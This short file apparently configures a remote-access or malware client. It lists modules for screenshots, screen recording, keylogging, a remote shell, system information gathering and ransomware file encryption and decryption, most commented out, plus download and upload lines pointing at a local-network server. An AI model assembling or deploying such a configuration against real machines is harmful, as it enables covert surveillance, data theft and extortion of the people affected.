m screenshot 10
# m screenr_ecord 15
# m kg 15
# m remote_shell_client 0
# m system_info 0
# m ransomware_encrypt_files 0
# m ransomware_decrypt_files 0

d http://192.168.1.110:8000/

u http://192.168.1.110:8000/
